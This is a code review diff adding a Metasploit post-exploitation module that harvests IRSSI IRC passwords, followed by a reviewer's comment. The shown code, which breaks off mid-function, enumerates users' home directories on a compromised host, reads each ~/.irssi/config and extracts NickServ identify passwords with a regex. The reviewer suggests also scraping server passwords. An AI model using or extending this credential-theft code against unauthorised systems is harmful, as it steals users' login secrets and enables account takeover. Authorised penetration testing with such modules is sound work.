modules/post/multi/gather/irssi_creds.rb

```diff
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'         => 'Multi Gather IRSSI IRC Password(s)',
+      'Description'  => %q{
+        This module grabs IRSSI IRC credentials.
+      },
+      'Author'       => [
+        'Jonathan Claudius <jclaudius[at]mozilla.com>',
+      ],
+      'Platform'     => %w{bsd linux osx unix},
+      'SessionTypes' => %w{shell},
+      'License'      => MSF_LICENSE
+    ))
+  end
+
+  def run
+    print_status('Finding ~/.irssi/config')
+    paths = enum_user_directories.map { |d| d + '/.irssi/config' }
+    paths = paths.select { |f| file?(f) }
+
+    if paths.empty?
+      print_error('No users found with a ~/.irssi/config file')
+      return
+    end
+
+    download_passwords(paths)
+  end
+
+  # Example of what we're looking for in the config...
+  #
+  # autosendcmd = "/msg nickserv identify example_password ;wait 2000";
+  #
+  def extract_passwords(path)
+    data = read_file(path)
+    passwords = data.scan(/\/msg nickserv identify ([^\s]+) /)
```

Comment:
Pretty sure it's case-insensitive. Don't forget you can use a server password for certain networks. Might want to scrape those, too.